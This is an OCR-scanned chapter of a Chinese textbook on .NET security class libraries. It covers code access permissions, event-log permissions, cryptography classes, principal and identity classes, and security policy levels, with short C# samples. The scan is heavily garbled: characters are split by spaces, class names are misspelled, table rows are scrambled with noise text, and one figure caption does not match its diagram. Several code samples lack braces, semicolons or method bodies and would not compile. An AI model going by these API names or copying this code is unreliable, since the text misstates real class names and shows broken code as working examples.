件 的 规则 ， 该 规则 要 求 其 调用 方 拥有 创建 文件 的 权限 。 

如 果 代 码 请 求 类 库 的 资源 ， 而 满足 类 库 所 要 求 的 权限 ， 则 允许 代码 访问 该 类 库 ， 同 时 
保护 资源 不 受 未 经 授权 的 访问 。 即 使 代码 拥有 访问 某 个 类 库 的 权限 ， 但 如 果 调用 该 代码 的 
代码 没有 访问 该 类 库 的 权限 ， 也 将 不 允许 其 运行 。 

代码 访问 安全 性 并 未 消除 编写 代码 时 出 现 人 为 错误 的 可 能 性 ， 但 是 如 果 应 用 程序 使 用 
安全 类 库 访问 受 保护 的 资源 , 应 用 程序 代码 的 安全 风险 会 减 小 。 基 于 .NET 框架 的 托管 安全 
类 库 帮 助 开 发 人 员 加 密 和 解密 敏感 数据 ， 制 定安 全 代码 访问 策略 。 安 全 命名 空间 下 主要 包 
括 6 个 类 库 ， 如 表 2-1 所 示 。 


表 2-1 安全 命名 空间 类 库 







意义 与 作用 类 库 名 
验证 URL 和 文件 信息 处 理 和 其 他 安全 认证 | System.Security 
Web 加 密 和 解密 System.Security.Policy 
用 户 安全 控制 System Security Pemmissions 


2.1 安全 类 的 总 体 架 构 


在 .NET 安全 类 库 的 6 个 部 件 中 ， 负 责 公 共 语 言 运行 类 库 安全 性 的 基 类 有 5 个 ， 负 责 
Web 应 用 的 安全 类 有 1 个 。 安 全 命名 空间 的 描述 内 容 和 归属 情况 如 图 2-1 所 示 。 


System. Web.Securit| System.Security 安全 类 信息 处 理 

为 网 站 链接 和 文件 进行 授 | 

a 2 
We 基础 代码 的 安全 规则 

System.Security. System.Security. 
Cryptography Permissions 
加 密 解密 和 哈 | 。 System.Security. 人 
希 算法 类 库 Principal 


用 户 基础 安全 代码 


图 2-1 收文 管理 功能 的 业务 逻辑 













System.Securi 
Policy 
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2.2 System.Security 


System.Security 提供 公共 语言 运行 类 库 安全 系统 的 基础 结构 ， 其 中 包括 定义 所 有 代码 
访问 权限 的 基础 类 CodeAccessPermission。 该 基础 类 不 能 直接 使 用 ， 开 发 人 员 需 要 赋予 代 
码 特 别 的 权限 来 访问 指定 的 资源 ， 如 使 用 FileIOPermission 赋予 代码 权限 来 完成 公文 的 IO 
操作 ， 使 用 EventLogPermission 赋予 代码 访问 操作 系统 日 志 的 权限 等 。 

System.Security 命名 空间 也 包括 一 些 设置 权限 信息 的 基础 类 ， 主 要 包括 PermissionSet 
和 NamedPermissionSet。 

在 处 理 Web 系统 的 出 错 信息 环节 上 ， 开 发 人 员 可 以 利用 安全 信息 处 理 类 Security 
Exception。 该 类 用 于 保密 系统 的 安全 错误 处 理 ， 防 止 它们 落 入 黑客 之 手 。 

目前 很 多 木马 都 是 通过 文件 的 方式 注入 到 正在 运行 的 Web 系统 。 下 面 两 个 实例 将 告诉 
读者 如 何 加 固 Web 系统 的 文件 上 传 功能 和 安全 日 志 功能 。 


1. 文件 系统 控制 


FileIOPermissionAccess 提供 下 列 4 种 文件 IO 访问 权限 类 型 : 

(1) Read: 对 文件 内 容 的 读 权限 或 对 有 关 该 文件 的 信息 (如 它 的 长 度 或 上 次 修改 时 间 》 
的 读 权限 。 

(2) Write: 对 文件 内 容 的 写 权 限 或 更 改 有 关 该 文件 信息 的 写 权 限 ， 同 时 还 允许 删除 和 
改写 。 

(3) Append: 仅 向 文件 结尾 写 入 的 能 力 ， 不 能 读 取 。 

(4) PathDiscovery: 对 路 径 本 身 信息 的 访问 权限 。 这 可 以 保护 路 径 中 的 敏感 信息 (如 
用 户 名 ) 以 及 有 关 路 径 中 显示 的 目录 结构 信息 。 此 类 型 不 授予 对 路 径 所 指 代 的 文件 或 文件 
夹 的 访问 权限 。 

假设 这 时 用 户 需要 读 取 服 务 器 上 D 盘 下 的 IOtest.doc 文件 ， 则 需要 检测 当前 进程 的 权 
限 后 再 决定 是 否 执行 该 读 写 操作 。 实 现代 码 如 下 : 

FileIOPermission IOtest = new FileIOPermission(FileIOPermissionRccess.Read， 

2 (FileIOPermissionAccess.Write | 

FileIOPermissionAccess.Read,，"D:\\example\\IOtest.doc"); // 创建 读 写 对 象 





try 
1 
IOtest.Demand() // 检测 权限 
} 
catch (SecurityException s) 
{ 
Console.WriteLine(s.Message); // 抛 错 
} 


需要 注意 的 是 ，FileIOPermission.Demand0) 执 行 这 一 权限 的 检测 工作 , 遍历 此 方法 调用 
链 上 的 所 有 组 件 ， 检 测 他 们 是 否 有 读 写 权 限 。 


2. 正确 记录 日 志 
开发 人 员 把 系统 安全 日 志 信 息 存放 到 数据 库 或 者 系统 运行 目录 下 的 做 法 是 不 安全 的 。 
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为 了 确保 包括 敏感 数据 和 错误 数据 的 文件 不 被 黑客 获取 ， 最 安全 的 方法 就 是 将 它们 存 
放 到 服务 器 安全 日 志 。 但 请 读者 注意 ， 日 志 代码 如 果 设 计 于 单个 的 程序 集中 ， 则 不 能 利用 
该 代码 来 阅读 现 有 记录 或 删除 事件 日 志 。 这 种 情况 下 应 该 解决 的 主要 威胁 是 ， 如 何 阻止 恶 
意 调用 方 在 一 次 尝试 中 多 次 调用 代码 , 强制 日 志文 件 循环 履 盖 以 前 的 日 志 条 目 来 隐匿 踪迹 。 
解决 这 个 问题 的 最 好 办 法 是 使 用 出 界 机 制 , 如 只 要 事件 日 志 一 达到 阔 值 就 向 操作 员 发 出 警报 。 

EventLogPermission 类 实现 对 事件 日 志 服 务 的 读 或 写 访 问 ， 访 问 事件 日 志 必须 使 用 代 
码 访问 安全 性 策略 为 程序 集 授 予 属性 EventLogPermission 。 

当 需 要 制约 事件 日 志 代码 的 权限 ， 则 需要 由 开发 人 员 声 明 属性 SecurityAction . 
PermitOnly。 该 属性 可 以 确保 WriteToLosg 方法 及 其 调用 的 其 他 方法 只 能 访问 本 地 计算 机 的 
事件 日 志 ， 而 无 法 删除 事件 日 志 或 事件 源 ， 实 例 代码 如 下 : 

















[EventLogPermission(SecurityAction.PermitOnly, 

MachineName=".", 
PermissionAccess=EventLogPermissionAccess.Instrument)]// 声明 访问 权限 
public static void WriteToLog( string message ) 


} 


当 Web 系统 的 日 志 代 码 位 于 程序 集 时 , 则 需要 确保 在 没有 给 代码 授予 充分 的 日 志 访问 
权限 前 无 法 加 载 程序 集 ， 应 添加 带 SecurityAction.RequestMinimum 的 程序 集 访问 属性 
EventLogPermissionAttribute， 实 例 代码 如 下 : 

// 此 属性 表示 代码 要 求 具有 只 访问 

// 本 地 计算 机 (".") 上 的 事件 日 志 的 能 力 并 需要 规范 访问 

// 这 说 明 它 可 以 读 取 或 写 入 现存 日 志 并 创建 新 事件 源 

// 和 事件 日 志 

[assembly:EventLogPermissionAttribute (SecurityAction.RequestMinimum, 

MachineName=".", 

PermissionAccess= 

EventLogPermissionAccess.Instrument)] 

public static void WriteToLog( string message ) 


i 
]: 


上 述 情 况 是 针对 Web 托管 代码 而 言 的 ， 而 对 于 使 用 C+HC 编写 的 组 件 或 应 用 程序 ， 则 
需要 有 选择 性 的 控制 它们 的 访问 权限 。 在 System.Security 空间 ，SupressUnmanaged 
SecurityAttribute 用 来 控制 非 托 管 代码 的 访问 权限 。 当 托管 代码 调 入 非 托管 代码 (通过 PInvoke 
或 COM Interop 进入 本 机 代码 ) 和 程序 编译 链接 时 ， 均 要 求 UnmanagedCode 权限 以 确保 所 有 
调用 方 都 有 允许 调 入 的 必要 权限 。 例 如 ， 函 数 A 调用 函数 B， 并 且 函 数 B 用 
SuppressUnmanagedCodeSecurityAttribute 进行 了 标记 ， 则 在 实时 编译 时 检查 函数 A 的 非 托管 
代码 权限 ,但 随后 在 运行 时 不 进行 检查 ， 因 此 使 用 此 属性 应 特别 小 心 ， 否 则 会 产生 安全 漏洞 。 





2.3 System.Security.Cryptography 


Cryptography 命名 空间 用 来 完成 软件 系统 信息 加 密 和 解密 ， 主 要 依赖 于 哈 希 技术 Hash 
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和 随机 因子 算法 RNG。 
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表 2-2 所 示 为 主要 加 密 类 ， 更 加 清晰 的 描述 了 该 加 解密 空间 下 的 功能 类 。 


表 2-2 System.Security.Cryptography 下 的 主要 类 


类 名 称 
CryptoConfig 


功 能 
访问 加 密 配置 信息 





CryptographicAttributeObject 


包含 一 个 类 型 和 与 该 类 型 相关 联 的 值 的 集合 





CryptographicAttributeObjectCollection 


CryptographicAttributeObjectEnumerator 


J1 含 CryptographicAttributeObject 对 象 的 集合 
为 CryptographicAttributeObjectCollection 集合 提供 枚 举 
功能 





CryptographicException 


加 密 操作 中 出 现 错误 时 引发 的 异常 





CryptographicUnexpectedOperationException 


加 密 操作 中 出 现 意外 操作 时 引发 的 异常 





CryptoStream 


DES 


定义 将 数据 流 链接 到 加 密 转 换 的 流 
所 有 DES 实现 都 必须 从 中 派生 的 数据 加 密 标 准 算法 的 
基 类 








DESCryptoServiceProvider 


DSA 
DSACryptoServiceProvider 
DSASignatureDeformatter 
DSASignatureFormatter 


定义 访问 数据 加 密 标 准 算法 的 加 密 服务 提供 程序 版 本 的 
包装 对 象 

所 有 数字 签名 算法 

定义 访问 DSA 算法 的 加 密 服 务 提供 程序 实现 的 包装 对 象 
验证 数字 签名 算法 

创建 数字 签名 算法 





1 




















FromBase64Transform 从 Base 64 转换 CryptoStream 
HashAlgorithm 定义 所 有 加 密 哈 希 算法 实现 均 必 须 从 中 派生 的 基 类 
KeyedHashAlgorithm 定义 所 有 加 密 哈 希 算法 实现 均 必 须 从 中 派生 的 抽象 类 
KeySizes 确定 对 称 加 密 算法 的 有 效 密 钥 大 小 设置 
MD5 MDS5 哈 希 算法 的 所 有 实现 均 从 中 继承 的 抽象 类 
MDscng 提供 MD5 ( 消息 摘要 5) 128 位 哈 希 算法 的 CNG (下 一 
代 加 密 技术 ) 实现 
MD5CryptoServiceProvider 使 用 加 密 服 务 提供 程序 
PasswordDeriveBytes 使 用 PBKDF1 算法 的 扩展 从 密码 派生 密 钥 
PKCS1MaskGenerationMethod 根据 PKCS#1 计算 用 于 密 钥 交 换算 法 的 掩 码 
ProtectedData 提供 数据 保护 和 取消 数据 保护 的 方法 ， 无 法 继承 此 类 
ProtectedMemory 提供 内 存 保护 和 取消 内 存 保护 的 方法 ， 无 法 继承 此 类 
RandomNumberGenerator 定义 加 密 随机 数 生成 器 的 所 有 实现 均 从 中 派生 的 抽象 类 
2 2 使 用 加 密 服务 提供 程序 提供 的 实现 来 实现 加 密 随 机 数 生 
RNGCryptoServiceProvider 成 器 
RSA 定义 RSA 算法 的 所 有 实现 均 从 中 继承 的 基 类 
. 使 用 加 密 服 务 提供 程序 提供 的 RSA 算法 实现 不 对 称 加 
RSACryptoServiceProvider wi 


RSAOAEPKeyExchangeDeformatter 
RSAOAEPKeyExchangeFormatter 


密 和 解密 
对 最 优 不 对 称 加 密 填 充 密 钥 交换 数据 进行 解密 
使 用 RSA 创建 最 优 不 对 称 加 密 填充 密 钥 交换 数据 





RSAPKCS1KeyExchangeDeformatter 


解密 PKCS#1 密 钥 交 换 数 据 





RSAPKCS1KeyExchangeFormatter 
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使 用 RSA 创建 PKCSH#I 密 钥 交 换 数据 
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类 名 称 功 能 
RSAPKCS1SignatureDeformatter 验证 RSAPKCS#1 1.5 版 签名 
RSAPKCS1SignatureFormatter 创建 RSAPKCS#1 1.5 版 签名 
SHA1 计算 输入 数据 的 SHA1 哈 希 值 
SHA1Cng 提供 安全 哈 希 算法 (SHA) 的 下 一 代 加 密 技术 (CNG) 
实现 
SHA1CryptoServiceProvider 使 用 加 密 服 务 提 供 程序 
SHA1Managed 使 用 托管 类 库 计 算 输 入 数据 的 SHA1 哈 希 值 
提供 使 用 512 位 哈 希 值 的 安全 哈 希 算法 (SHA) 的 下 一 
SHA512Managed 代 加 密 技术 (CNG) 实现 
SymmetricAlgorithm 定义 所 有 对 称 算法 的 实现 都 必须 从 中 继承 的 抽象 基 类 
ToBase64Transform 将 CryptoStream 转换 为 Base 64 
人 定义 三 重 数 据 加 密 标准 算法 的 基 类 ,TripleDES 的 所 有 实 
TripleDES 


现 都 必须 从 此 基 类 派生 
定义 访问 TripleDES 算法 的 加 密 服务 提供 程序 (CSP) 


TripleDESCryptoServiceProvider 版 本 的 包装 对 象 





2.4 System.Security.Principal 


Principal 命名 空间 下 的 类 库 用 来 支撑 角色 安全 控制 ， 还 用 来 约束 人 员 所 能 够 访问 的 类 
和 类 成 员 。 该 命名 空间 包括 的 接口 是 IPrincipal 和 IIdentity， 提 供 开发 人 员 构 建 Web 应 用 
系统 的 验证 规则 ， 主 要 分 为 以 下 两 个 部 分 : 

1， 自 定义 验证 

通过 使 用 GenericPrincipal 和 GenericIdentity 自 定义 专门 的 角色 和 用 户 身 份 信息 。 

2. Windows 验 证 


通过 WindowsPrincipal 和 WindowsIdentity 创建 符合 Windows 安全 认证 标准 的 账户 信 
息 ， 信 息 的 审核 标准 必须 依据 Windows 用 户 组 来 确定 。 
表 2-3 所 示 为 主要 加 密 类 ， 更 加 清晰 的 描述 了 该 加 解密 空间 下 的 功能 类 。 
表 2-3 Principal 下 的 主要 类 
类 名 称 功 能 
GenericIdentity 





表示 一 般 用 户 

表示 代码 访问 规则 
IdentityNotMappedException | 表示 其 标识 未 能 映射 到 已 知 标识 的 主体 的 异常 
NTAccount 和 SecurityIdentifier 类 的 基 类 。 此 类 不 提供 公共 构造 函数 ， 
不 能 被 继承 

表示 IdentityReference 对 和 象 的 集合 ， 并 提供 一 种 方法 将 Identity 
Reference 派生 的 对 象 集 转换 为 IdentityReference 派生 的 类 型 





GenericPrincipal 












TdentityReference 





TdentityReferenceCollection 
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NTAccount 表示 一 个 用 户 或 组 账户 
SecurityIdentifier 表示 一 个 安全 标识 符 并 为 其 提供 封 送 处 理 和 比较 操作 





WindowsIdentity 表示 Windows 用 户 
WindowsImpersonationContext | 表示 模拟 操作 之 前 的 Windows 用 户 





WindowsPrincipal 允许 代码 检查 Windows 用 户 的 Windows 组 成 员 身 份 


下 面 的 实例 说 明 GenericIdentity 类 和 GenericPrincipal 类 如 何 合 起 来 使 用 ， 以 创建 自 定 
义 并 且 独 立 于 Windows 域 的 身份 验证 方案 。 该 实例 创建 自 定义 规则 名 称 为 MyIdentity 的 身 
份 验 证 对 象 ， 并 向 线程 附加 安全 访问 角色 Manager 和 Teller。 

实例 代码 如 下 : 

using System; 


using System.Security.Principal; 
using System.Threading; 


public class test Custom Principal 
CE 


public static int Main(string[] args) 


// 创 建新 的 身份 信息 
GenericIdentity MyIdentity = new GenericIdentity("MyIdentity") 
// 创建 身份 规则 
String[] MyStringArray = {"Manager", "Teller"}; 
GenericPrincipal MyPrincipal = 

new GenericPrincipal (MyIdentity, MyStringArray); 
// 附加 规则 到 线程 
Thread.CurrentPrincipal = MyPrincipal; 
// 显示 执行 结果 
String Name = MyPrincipal.Identity.Name; 
bool Auth = MyPrincipal.Identity.IsAuthenticated; 
bool IsInRole = MyPrincipal.IsInRole ("Manager"); 


Console.WriteLine ("The Name is: {0}", Name); 
Console.WriteLine ("The IsAuthenticated is: {0}", Auth); 
Console.WriteLine("Is this a Manager? {0}", IsInRole); 


return 0; 


! 


2.5 System.Security.Policy 


Policy 命名 空间 集合 了 Web 系统 研发 中 能 够 用 到 的 安全 代码 策略 , 主要 包括 证 据 类 和 
策略 等 级 。 


1. 证 据 类 


证 据 类 是 安全 策略 的 输入 ， 成 员 环 境 是 开关 ， 两 者 一 起 创建 策略 声明 并 确定 授予 的 权 
限 集 。 策 略 等 级 和 代码 组 是 策略 层次 结构 的 结构 。 代 码 组 是 规则 的 封装 ， 它 们 在 策略 级 别 


。22 。 








第 2 章 ”类 库 与 安全 类 


中 按 层次 结构 排列 。 

证 据 对 象 实际 在 运行 库 内 部 被 分 为 两 个 不 同 的 集合 ， 宿 主 证 据 集合 和 程序 集 证 据 集 

合 。 宿 主 证 据 集合 是 操作 系统 中 已 发 现 的 程序 集 是 如 何以 及 从 哪里 进入 相关 机 器 中 的 证 据 
合 ， 程 序 集 证 据 集合 是 有 关 如 何以 及 何 时 被 加 载 到 内 存 的 证 据 集合 

证 据 可 以 以 任何 数据 类 型 的 对 象 ， 至 于 哪 类 证 据 可 以 被 用 于 这 个 扩展 的 策略 系统 ， 没 
有 绝对 的 限制 。 即便 如 此 , 在 许多 情况 下 为 了 建立 信任 和 通过 .NET 安全 策略 系统 检查 ,在 
程序 集中 通常 使 用 如 下 三 种 类 型 的 证 据 : 

(1) 发 布 者 签名 。 发 布 者 签名 作为 内 嵌 的 和 编译 过 的 元 数据 集 ， 指 出 程序 集 的 作者 及 
其 可 靠 性 。 发 布 者 签名 还 包含 一 个 数字 证 书 ， 提 供 了 一 个 由 第 三 方 执行 的 验证 ， 将 进一步 
确认 程序 集 发 布 者 的 可 靠 性 。 

(2) 强 命名 。 强 命名 包含 在 System.Security.Policy.StrongName 类 中 ， 是 一 套 证 据 ， 包 
括 名 称 、 版 本 号 、 散 列 以 及 公 钥 。 

(3) 散 列 。 散 列 包含 在 System.Security.Policy.Hash 类 中 ， 本 质 上 是 为 程序 集 指定 的 一 
个 唯一 数字 标识 。 散 列 是 一 个 有 用 的 工具 ， 作 为 和 程序 集 关 联 的 数值 ， 直 接 和 文件 名 关联 。 


2. 策略 级 别 


在 .NET 中 使 用 了 4 种 策略 级 别 。 它 们 用 于 确定 一 个 合适 的 权限 , 指定 给 特定 的 程序 集 。 
这 4 种 策略 分 别 是 Enterprise、Machine、User、AppDomain。 

策略 级 别 Enterprise 表示 Intranet 中 安装 活动 目录 (Active Directory，AD) 的 机 器 。 
Enterprise 级 策略 是 最 项 层 的 策略 级 别 ， 并 且 会 取代 在 Machine 和 User 策略 级 别 中 建立 的 
策略 设置 。 在 服务 器 上 定义 策略 的 实际 策略 文件 位 于 X: \WINDOWS\Microsoft.NET\ 
Framework\V XXXX\config\enterprisesec.config。 

口 Machine 策略 配置 针对 一 个 特定 机 器 的 所 有 用 户 。 

口 User 策略 级 别 上 只 应 用 于 一 台 特 定 机 器 上 的 一 个 特定 用 户 。 

口 AppDomain 作用 于 整个 进程 域 的 用 户 。 

每 个 策略 都 包含 代码 组 、 策 略 程序 集 和 权限 集 。 代 码 组 根据 完整 的 访问 控制 配置 ， 
为 .NET 程序 集 提 供 安全 支持 。 代 码 组 定义 为 满足 特定 成 员 条 件 的 权限 集合 。 如 果 成 员 条 件 
不 符合 ， 那 么 代码 组 就 不 会 为 程序 集 授权 。 每 个 代码 组 都 配置 一 个 策略 声明 ， 用 于 解释 为 
其 配置 了 哪些 权限 集 。 

用 于 .NET 程序 集 部 署 的 配置 工具 通常 是 NET 配置 工具 (mscorecfg msc) 。 如 果 需 要 
调 出 安全 配置 工具 ， 需 要 启动 NET 命令 窗口 ， 并 输入 Mscorcfg msc。 也 可 以 从 命令 提示 窗 
口 输入 完整 版 本 路 径 : %Systemroot%\Microsoft.NET\Framework\version Number\ 
Mscorcfg msc。 假如 基于 .NET 3.5 配置 Web 开发 工具 , 则 需要 下 载 SDK (Windows Software 
Development Kit) 。 

为 了 更 加 清晰 的 描述 该 安全 策略 空间 下 的 功能 类 , 特 列 出 主要 策略 类 ,如 表 2-4 所 示 。 

















表 2-4 主要 策略 类 
类 名 称 功 能 
AllMembershipCondition 表示 与 所 有 代码 匹配 的 成 员 条 件 
ApplicationDirectory 提供 应 用 程序 目录 作为 策略 评估 的 证 据 


通过 测试 程序 集 的 应 用 程序 目录 确定 该 程序 集 是 否 属于 
代码 组 





ApplicationDirectoryMembershipCondition 
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类 名 称 功 能 
ApplicationSecurityInfo 保存 应 用 程序 的 安全 证 据 
ApplicationSecurityManager 管理 清单 激活 应 用 程序 的 信任 决定 
ApplicationTrust 封装 关于 应 用 程序 的 安全 决策 
ApplicationTrustCollection 表示 ApplicationTrust 对 象 的 集合 
SR 表示 ApplicationTrustCollection 集合 中 ApplicationTrust 对 
ApplicationTrustEnumerator 象 的 枚 举 数 
CodeConnectAccess 指定 授予 代码 的 网 络 资源 访问 权限 
CodeGroup 表示 抽象 基 类 ， 必 须 从 该 基 类 中 导出 代码 组 的 所 有 实现 
Evidence 定义 组 成 对 安全 策略 决策 的 输入 的 一 组 信息 
向 符合 成 员 条 件 的 代码 程序 集 授 予 权 限 以 操作 位 于 代码 
ey 程序 集中 的 文件 
许 古 的 策略 声 第 一 个 匹配 的 子 代 而 和 策 
FirstMatchCodeGroup 0 pe 2 本 的 生 横 本 组 的 守 
确认 一 个 代码 程序 集 在 全 局 程序 集 缓存 中 以 策略 评估 证 
GacInstalled 


GacMembershipCondition 


Hash 
HashMembershipCondition 
NetCodeGroup 
PermissionRequestEvidence 
PolicyException 
PolicyLevel 


PolicyStatement 


Publisher 





据 的 形式 产生 

通过 测试 程序 集 的 全 局 程序 集 缓存 成 员 资 格 ， 确 定 该 程序 
集 是 否 属于 代码 组 

提供 有 关 程序 集 的 哈 希 值 的 证 据 

通过 测试 程序 集 的 哈 希 值 确 定 该 程序 集 是 否 属于 代码 组 
向 从 其 下 载 程 序 集 的 站 点 授予 Web 权限 

定义 表示 权限 请 求 的 证 据 
当 策略 禁止 代码 运行 时 引发 的 异常 

表示 公共 语言 运行 库 的 安全 策略 级 别 ， 无 法 继承 此 类 
表示 描述 权限 和 其 他 适用 于 具有 特定 证 据 集 的 代码 的 信 
息 的 CodeGroup 的 语句 ， 无 法 继承 此 类 

提供 代码 程序 集 的 Authenticode X.509v3 数字 签名 作为 策 
略 评估 的 证 据 ， 无 法 继承 此 类 



















PublisherMembershipCondition 


通过 测试 程序 集 的 软件 发 行 Authenticode X.509v3 证 书 确 
定 程序 集 是 否 属于 代码 组 








Site 提供 从 其 中 产生 代码 程序 集 的 网 站 作为 策略 评估 的 证 据 

SiteMembershipCondition 通 过 测试 从 其 中 产生 程序 集 的 站 点 确定 该 程序 集 是 否 属 
于 代码 组 

StrongName 提供 代码 程序 集 的 强 名 称 作为 策略 评估 的 证 据 





StroneName MembershipCondition 


通过 测试 程序 集 的 强 名 称 确定 该 程序 集 是 否 属于 代码 组 





TrustManagerContext 


UnionCodeGroup 


表示 做 出 决定 以 运行 应 用 程序 时 和 为 新 的 AppDomain( 要 
在 其 中 运行 应 用 程序 ) 建立 安全 时 ， 信 任 关 系 管理 器 要 考 
虑 的 上 下 文 

表示 一 个 代码 组 ， 该 代码 组 的 策略 声明 是 当前 代码 组 的 策 
略 声明 和 所 有 其 匹配 的 子 代 码 组 策略 声明 的 联合 





Url 


提供 从 其 中 产生 代码 程序 集 的 URL 作为 策略 评估 的 证 据 





UrIMembershipCondition 
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类 名 称 功 能 
Zone 提供 代码 程序 集 的 安全 区 域 作为 策略 评估 的 证 据 
i: i 通过 测试 程序 集 的 原始 区 域 确定 该 程序 集 是 否 属于 代 
ZoneMembershipCondition 


码 组 





2.6 System.Security.Permissions 


Permissions 命名 空间 包含 能 够 控制 Web 系统 资源 的 权限 方法 。 对 于 Web 系统 来 说 ， 
该 命名 空间 下 的 类 库 能 够 控制 网 站 文件 信息 和 注册 表 资 源 ， 并 且 对 敏感 信息 进行 强 命名 。 
为 了 更 加 清晰 的 描述 该 权限 空间 下 的 功能 类 , 特 列 出 主要 权限 控制 类 ， 如 表 2-5 所 示 。 


类 名 称 
CodeAccessSecurityAttribute 


DataProtectionPermission 
DataProtectionPermissionAttribute 
EnvironmentPermission 
EnvironmentPermissionAttribute 
FileDialogPermission 
FileDialogPermissionAttribute 
FileIOPermission 
FileIOPermissionAttribute 
GacIdentityPermission 


GacIdentityPermissionAttribute 


表 2-5 权限 控制 类 
功 能 
为 代码 访问 安全 性 指定 基 属 性 
控制 访问 加 密 数 据 和 内 存 的 能 力 
允许 对 使 用 声明 安全 性 应 用 到 代码 中 的 DataProtectionPermission 
进行 安全 操作 
空 制 对 系统 和 用 户 环境 变量 的 访问 
允许 对 使 用 声明 安全 性 应 用 到 代码 中 的 EnvironmentPermission 
进行 安全 操作 
空 制 通过 “文件 ”对 话 框 访问 文件 或 文件 夹 的 能 力 
允许 对 使 用 声明 安全 性 应 用 到 代码 中 的 FileDialogPermission 
进行 安全 操作 
控制 访问 文件 和 文件 夹 的 能 力 
允许 对 使 用 声明 安全 性 应 用 到 代码 中 的 FileIOPermission 进行 
安全 操作 
定义 从 全 局 程序 集 缓存 中 产生 的 文件 的 标识 权限 
允许 对 使 用 声明 安全 性 应 用 到 代码 中 的 GacIdentityPermission 
进行 安全 操作 





























HostProtectionAttribute 





允许 使 用 声明 性 安全 操作 来 确定 宿主 保护 要 求 





IsolatedStorageFilePermission 


IsolatedStorageFilePermissionAttribute 


指定 允许 使 用 私有 虚拟 文件 系统 
允许 对 使 用 声明 安全 性 应 用 到 代码 中 的 IsolatedStorageFile 
Permission 进行 安全 操作 





IsolatedStoragePermission 


表示 对 一 般 独立 存储 功能 的 访问 





IsolatedStoragePermissionAttribute 


KeyContainerPermission 


允许 对 使 用 声明 安全 性 应 用 到 代码 中 的 IsolatedStorage 
Permission 进行 安全 操作 
控制 访问 密 钥 容器 的 能 





KeyContainerPermissionAccessEntry 


为 特定 密 钥 容 器 指定 访问 权限 





KeyContainerPermissionAccess 
EntryCollection 


表示 KeyContainerPermissionAccessEntry 对 象 的 集合 
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无 懈 可 击 


类 名 称 


KeyContainerPermissionAttribute 





全 方位 构建 安全 Web 系统 


功 能 
允许 对 使 用 声明 安全 性 应 用 到 代码 中 的 KeyContainerPermission 
进行 安全 操作 





描述 一 组 安全 权限 ， 安 全 权限 控制 音频 、 图 像 和 视频 媒体 在 














MediaPermission 不 完全 可 信和 的 Windows Presentation Foundation (WPF) 应 用 
程序 中 的 运行 能 
许 对 使 用 声明 安 应 用 到 代码 中 的 2 i 
We wy 对 使 用 声 胃 安 全 性 应 用 到 代码 中 的 MediaPermission 进行 
安全 操作 
ee 允许 对 使 用 声明 安全 性 应 用 到 代码 中 的 PermissionSet 进行 安 
PermissionSetAttribute De 
全 操作 
enna rea 允许 使 用 为 声明 和 强制 安全 性 操作 定义 的 语言 结构 来 检查 活 
ee 动用 户 (请 参见 IPrincipal) 
许 对 使 志明 安全 性 应 用 到 代码 中 的 Princi jssion 计 
pndipalDeniiseoi A 允许 对 使 用 声明 安全 性 应 用 到 代码 中 的 PrincipalPermission 进 





PublisherIdentityPermission 


PublisherIdentityPermissionAttribute 


ReflectionPermission 


ReflectionPermissionAttribute 
RegistryPermission 
RegistryPermissionAttribute 


ResourcePermissionBase 


ResourcePermissionBaseEntry 


SecurityAttribute 


行 安全 操作 

表示 软件 发 行者 的 身份 标识 

允许 对 使 用 声明 安全 性 应 用 到 代码 中 的 PublisherIdentity 

Permission 进行 安全 操作 

通过 System.Reflection API 控制 对 非 公共 类 型 和 成 员 的 访问 。 
空 制 System.Reflection.Emit API 的 一 些 功能 

允许 对 使 用 声明 安全 性 应 用 到 代码 中 的 ReflectionPermission 

进行 安全 操作 

控制 访问 注册 表 变 量 的 能 力 

允许 对 使 用 声明 安全 性 应 用 到 代码 中 的 RegistryPermission 进 

行 安全 操作 

允许 控制 代码 访问 安全 权限 

定义 代码 访问 安全 权限 集 的 最 小 单位 

为 CodeAccessSecurityAttribute 派生 自 的 声明 安全 性 指定 基 属 

性 类 











SecurityPermission 


描述 应 用 于 代码 的 安全 权限 集 





SecurityPermissionAttribute 


允许 对 使 用 声明 安全 性 应 用 到 代码 中 的 SecurityPermission 进 
行 安全 操作 





SiteldentityPermission 


为 作为 代码 来 源 地 的 网 站 定义 标识 权限 





SiteldentityPermissionAttribute 
StorePermission 


StorePermissionAttribute 


允许 对 使 用 声明 安全 性 应 用 到 代码 中 的 SiteIdentityPermission 
进行 安全 操作 
控制 对 包含 X.509 证 书 的 存储 区 的 访问 权限 

允许 对 使 用 声明 安全 性 应 用 到 代码 中 的 StorePermission 进行 
安全 操作 








StrongNameIdentityPermission 


为 强 名 称 定义 标识 权限 





StrongNameIdentityPermissionAttribute 





允许 对 使 用 声明 安全 性 应 用 到 代码 中 的 StrongNameIdentity 
Permission 进行 安全 操作 





StrongNamePublicKeyBlob 表示 强 名 称 的 公 钥 信 息 〈 称 为 Blob) 
UIPermission 控制 与 用 户 界面 和 剪贴 板 相关 的 权限 
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类 名 称 功 能 
i 允许 对 使 用 声明 安全 性 应 用 到 代码 中 的 UIPermission 进行 安 
UIPermissionAttribute i 
全 操作 
UrlIdentityPermission 为 代码 源 自 的 URL 定义 标识 权限 





允许 对 使 用 声明 安全 性 应 用 到 代码 中 的 UrlIdentityPermission 
进行 安全 操作 
对 象 控制 创建 Web 浏览 器 控件 的 能 力 
允许 对 使 用 声明 安全 性 应 用 到 代码 中 的 WebBrowser 
Permission 进行 安全 操作 


UrlIdentityPermissionAttribute 


WebBrowserPermission 








WebBrowserPermissionAttribute 





2.7 System.Web.Security 


Security 命名 空间 下 的 类 库 是 针对 Web 托管 代码 的 ， 完 成 用 户 的 权限 和 身份 验证 ， 主 
要 包括 Windows、Forms、Passport、URL 和 文件 的 安全 认证 功能 。 

从 ASPNET 3.0 开始 ，System.Web.Security 与 各 类 界面 安全 控件 结合 使 用 ， 简 化 开发 
人 员 的 重复 劳动 ， 涉 及 用 户 权 限 管 理 、 登 录 、 角 色 管 理 。 

Membership 类 由 ASPNET 应 用 程序 用 来 验证 用 户 凭据 并 管理 用 户 设 置 ( 如 密码 和 电 
子 邮件 地 址 ) 。 使 用 Roles 类 可 以 根据 指定 给 Web 应 用 程序 的 角色 的 用 户 组 对 应 用 程序 的 
授权 进行 管理 。 

Membership 类 和 Roles 类 都 使 用 提供 程序 ， 即 访问 应 用 程序 的 数据 存储 以 检索 成 员 资 
格 和 角色 信息 的 类 。 成 员 资 格 和 角色 信息 可 以 使 用 SqlMembershipProvider 和 
SqlRoleProvider 类 存储 在 Microsoft SQL Server 数据 库 中 ; 也 可 以 使 用 ActiveDirectory 
